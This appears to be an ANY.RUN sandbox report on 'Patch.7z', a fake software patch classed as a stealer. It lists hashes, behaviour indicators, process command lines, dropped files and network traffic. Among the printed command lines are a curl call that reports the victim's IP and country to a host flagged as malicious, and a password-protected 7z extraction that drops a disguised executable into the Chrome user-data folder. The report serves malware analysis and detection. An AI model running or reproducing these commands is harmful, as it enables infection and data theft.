File name:

Patch.7z

Full analysis: https://app.any.run/tasks/14caf700-db1a-4cbb-abc1-9ce5f9bb0ee7
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: February 14, 2025, 19:22:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
evasion
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

DF50A016C6A467AFB1D9BAF64A8FA777

SHA1:

37B8B5564DA5860AD20B60348893D674A069E76A

SHA256:

21EC5341D805322B77C67A1E5886E03880D62B19BD8AFD6D07B101F920EA855F

SSDEEP:

98304:xrTw5/kwnXIubgPFuiSIy3lDg+6ABWEirS8Aj/OEbXwewKsh+uxxpuDs8342ReE3:DNK8Pkq003zScRcV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 640)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 640)

    • Actions looks like stealing of personal data

      • 7z.exe (PID: 1876)
      • csrss.exe (PID: 616)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • cmd.exe (PID: 640)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6368)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Executable content was dropped or overwritten

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)

    • Drops 7-zip archiver for unpacking

      • Patch JB 2023.x.x.exe (PID: 6160)

    • Executing commands from a ".bat" file

      • Patch JB 2023.x.x.exe (PID: 6760)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 640)

    • Starts CMD.EXE for commands execution

      • Patch JB 2023.x.x.exe (PID: 6760)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 640)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 640)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 640)

    • Process drops legitimate windows executable

      • 7z.exe (PID: 1876)

    • The process creates files with name similar to system file names

      • 7z.exe (PID: 1876)

    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 640)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 640)

    • Checks Windows Trust Settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Connects to unusual port

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Checks for external IP

      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • svchost.exe (PID: 2192)

    • The executable file from the user directory is run by the CMD process

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Connects to SMTP port

      • Windows Driver Foundation (WDF).exe (PID: 2976)

  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6368)

    • The sample compiled with english language support

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)

    • Execution of CURL command

      • cmd.exe (PID: 640)

    • Reads the computer name

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Checks supported languages

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • curl.exe (PID: 4020)

    • Create files in a temporary directory

      • curl.exe (PID: 7096)

    • Creates files or folders in the user directory

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • The sample compiled with chinese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with polish language support

      • 7z.exe (PID: 1876)

    • The sample compiled with czech language support

      • 7z.exe (PID: 1876)

    • The sample compiled with Italian language support

      • 7z.exe (PID: 1876)

    • The sample compiled with french language support

      • 7z.exe (PID: 1876)

    • The sample compiled with japanese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with korean language support

      • 7z.exe (PID: 1876)

    • The sample compiled with russian language support

      • 7z.exe (PID: 1876)

    • The sample compiled with portuguese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with turkish language support

      • 7z.exe (PID: 1876)

    • The sample compiled with spanish language support

      • 7z.exe (PID: 1876)

    • Reads the machine GUID from the registry

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Creates files in the program directory

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Checks proxy server information

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Disables trace logs

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Reads the software policy settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)

EXIF

ZIP

FileVersion: 7z v0.04
ModifyDate: 2023:06:27 17:36:29+00:00
ArchivedFileName: Patch JB 2023.x.x.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
162
Monitored processes
12
Malicious processes
3
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe patch jb 2023.x.x.exe cmd.exe no specs svchost.exe patch jb 2023.x.x.exe cmd.exe curl.exe 7z.exe windows driver foundation (wdf).exe curl.exe rundll32.exe no specs csrss.exe

Process information

PID
CMD
Path
Indicators
Parent process
616%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\System32\csrss.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Client Server Runtime Process
Version:
10.0.19041.1 (WinBuild.160101.0800)
640C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\cc.bat""C:\Windows\System32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1876"C:\Program Files (x86)\7-zip\7z.exe" x "C:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7z" -o"C:\Users\admin\AppData\Local\google\chrome\user data" -pvdgdfgfHDSzxsHJCXdfdt45rtec5 -yC:\Program Files (x86)\7-Zip\7z.exe
cmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
HIGH
Description:
7-Zip Console
Exit code:
0
Version:
22.01
Modules
Images
c:\program files (x86)\7-zip\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\msvcp_win.dll
2120C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2976"C:\Users\admin\AppData\Local\google\chrome\user data\windows driver foundation (wdf).exe" -sdkKey 4e778bf2-7730-4884-91bb-ae9e7f00d213C:\Users\admin\AppData\Local\Google\Chrome\User Data\Windows Driver Foundation (WDF).exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\google\chrome\user data\windows driver foundation (wdf).exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4020curl -k -L "https://zeltitmp.net/pp/cu/cu.php?ip=84.17.49.16&vos=10&cid=DE&sid=jb23_3&pid=p2&s=1" --user-agent "cnfvp201"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
6160"C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
6368"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Patch.7zC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6760"C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
5 425
Read events
5 403
Write events
22
Delete events
0

Modification events

(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Patch.7z
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2976) Windows Driver Foundation (WDF).exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2976) Windows Driver Foundation (WDF).exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
Executable files
192
Suspicious files
4
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbl.7z
MD5:
SHA256:
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\7z2201.exeexecutable
MD5:734E95CDBE04F53FE7C28EEAAAAD7327
SHA256:8C8FBCF80F0484B48A07BD20E512B103969992DBF81B6588832B08205E3A1B43
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.Sinks.Http.xmlxml
MD5:13222C8CB2094F4A07612968F5ABAC62
SHA256:4B70FBCE077922EE5319DFD6225BF4A33076C8B885FB72BEEBB0C8AC459D3A4D
6368WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exeexecutable
MD5:2225A9180E142415AE27486FC2631809
SHA256:78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\0CNOMD1A.battext
MD5:DC730F24799DF72D573C61FBE2CFE19F
SHA256:3AD7D102E167A040188C725DFCB789E31E11D11ACFD6F395246275744497E320
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.Sinks.PeriodicBatching.xmlxml
MD5:927D41A2570B5B0C2E950BC2C290A0A5
SHA256:6489C4D9E147ADF0C1B7C16B1D7187A8C6EF4ED15E94AD7E53E822977A08FBA9
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.xmlxml
MD5:4AE50EE65BF867DAE8311C45F84F8CB5
SHA256:54C024B0991C1814D62C071FE2BFB2C3E34776D91DEDBFEE5251BEE4408D76E8
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\msdatsrc.tlbexecutable
MD5:973FBDCE02205F14EA295236E08A2350
SHA256:BFAE1BE26E15ABDE04C100257494AA79DB0855997CD53B06D25BA13B590137BC
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Extensions.Logging.Abstractions.xmlxml
MD5:FFFC56AEC29193A7FAAB2EA8BA881606
SHA256:8EA6209C93E063A0F0E03FEB43DBE05F0E7E4CD5117B6519C566183D27B7B81C
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Newtonsoft.Json.xmlxml
MD5:D398FFE9FDAC6A53A8D8BB26F29BBB3C
SHA256:79EE87D4EDE8783461DE05B93379D576F6E8575D4AB49359F15897A854B643C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
48
DNS requests
28
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.163:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6600
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2976
Windows Driver Foundation (WDF).exe
GET
200
51.159.182.2:80
http://verification.repocket.com/api/peer/verification
unknown
unknown
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2976
Windows Driver Foundation (WDF).exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
23.48.23.163:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
104.126.37.128:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
2.19.106.8:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2.21.65.132:443
www.bing.com
Akamai International B.V.
NL
whitelisted
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
34.117.59.81:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.163
  • 23.48.23.159
  • 23.48.23.161
  • 23.48.23.172
  • 23.48.23.173
  • 23.48.23.169
  • 23.48.23.170
  • 23.48.23.160
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 23.54.109.203
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
login.live.com
  • 20.190.159.4
  • 40.126.31.0
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.130
  • 40.126.31.1
  • 20.190.159.71
  • 40.126.31.73
whitelisted
c.zeltitmp.net
  • 141.136.39.211
malicious
zeltitmp.net
  • 141.136.39.211
malicious

Threats

PID
Process
Class
Message
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2976
Windows Driver Foundation (WDF).exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Patch.7z